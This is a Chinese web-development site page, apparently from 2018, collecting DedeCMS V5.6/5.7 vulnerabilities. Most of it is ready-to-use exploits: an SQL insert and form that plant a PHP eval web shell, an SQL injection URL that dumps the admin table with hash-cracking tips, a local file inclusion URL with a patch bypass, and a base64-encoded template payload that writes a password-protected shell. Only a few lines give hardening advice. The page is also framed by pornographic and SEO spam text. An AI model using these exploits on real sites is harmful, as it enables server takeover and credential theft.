婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 網(wǎng)站建設(shè) > 建站知識(shí) > 織夢(mèng)dedecmsV5.7SP1漏洞問題收集總結(jié)

織夢(mèng)dedecmsV5.7SP1漏洞問題收集總結(jié)

POST TIME:2018-02-04 22:25

最近織夢(mèng)dedecms網(wǎng)站管理系統(tǒng)的漏洞經(jīng)常的出現(xiàn),導(dǎo)致使用dedecms程序建站的朋友很是老火,怎么才能保證自己的網(wǎng)站不會(huì)被入侵呢。下面dedecms模板中心收集了織夢(mèng)Dedecms V5.6/V5.7漏洞問題,大家保參考然后進(jìn)行修補(bǔ)吧。

DedeCms v5.6-5.7 最新漏洞 拿 WebShell EXP (5.18)

前題條件,必須準(zhǔn)備好自己的dede數(shù)據(jù)庫(kù),然后插入數(shù)據(jù):

以下是引用片段:

代碼如下  

insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", 'a');@fwrite($fp, '<?php eval($_POST[c]) ?>');echo "OK";@fclose($fp);{/dede:php}');

再用下面表單提交,shell 就在同目錄下 1.php。原理自己研究。。。


以下是引用片段:

代碼如下  

<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
<input type="text" value="http://localhost:8080/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

此問題官方還沒有解決辦法,個(gè)人建義刪除mytag_js.php文件,并把數(shù)據(jù)表中的XX_mytag表的中的text類開的字段修改,并且限制最多為1字節(jié),如果你不使用這個(gè)功能。

DedeCms V5.6注入+本地包含0day

一、advancedsearch.php注入0day

代碼如下  
plus/advancedsearch.php

$sql 變量未初始化。導(dǎo)致雞助注入。

原理不多說自已百度去,直接EXP:

代碼如下  
http://www.xxx.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

dede的密碼破解方法是32位MD5減去頭5位,減去尾七位,得到20MD5密碼,方法是,前減3后減1,得到16位MD5。

二、carbuyaction.php本地包含雞助0day

漏洞文件:plus/carbuyaction.php

還是原理不多說自已百度去,直接EXP:

代碼如下  
http://www.xxx.com/plus/carbuyaction.php?dopost=return&code=../../

如果打了補(bǔ)丁在cookie中加上code=alipay繼續(xù)使用。
再暴一個(gè)BUG,直接訪問:

代碼如下  
http://www.dedecms.com/plus/carbuyaction.php?dopost=return&dsql=xx

暫時(shí)沒什么利用價(jià)植,BUG一個(gè)。

DedeCms v5.6 惡意代碼執(zhí)行漏洞

影響版本:

DedeCms v5.6漏洞描述:
在上傳軟件的地方,對(duì)本地地址沒有進(jìn)行有效的驗(yàn)證,可以被惡意利用
測(cè)試方法:
注冊(cè)會(huì)員,上傳軟件:本地地址中填入

代碼如下  
a{/dede:link}{dede:toby57 name="'']=0;phpinfo();//"}x{/dede:toby57},

發(fā)表后查看或修改即可執(zhí)行

代碼如下  

a{/dede:link}{dede:toby57 name="'']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}

生成x.php 密碼:xiao直接生成一句話。密碼xiao 大家懂得SEBUG安全建議:
廠商補(bǔ)丁:
DEDECMS
目前廠商還沒有提供補(bǔ)丁或者升級(jí)程序,我們建議使用此軟件的用戶隨時(shí)關(guān)注廠商的主頁以獲取最新版本

個(gè)人教訓(xùn):我們可把upload,data目錄設(shè)置不可執(zhí)行和php文件,plus目錄設(shè)置不要寫任何文件,把不要的文件刪除,模板目錄最好也不可以上傳和修改任何文件。



收縮
  • 微信客服
  • 微信二維碼
  • 電話咨詢

  • 400-1100-266
主站蜘蛛池模板: 南投市| 邢台县| 乐安县| 达孜县| 三明市| 太白县| 镇远县| 军事| 阳春市| 枣阳市| 玉林市| 右玉县| 衡阳县| 琼海市| 呼伦贝尔市| 勐海县| 南靖县| 区。| 昂仁县| 车险| 华容县| 图木舒克市| 扎兰屯市| 汕尾市| 林甸县| 邯郸市| 安西县| 盐池县| 通海县| 泰兴市| 和林格尔县| 神农架林区| 宁化县| 睢宁县| 宁德市| 崇州市| 镇沅| 大石桥市| 项城市| 五华县| 郁南县|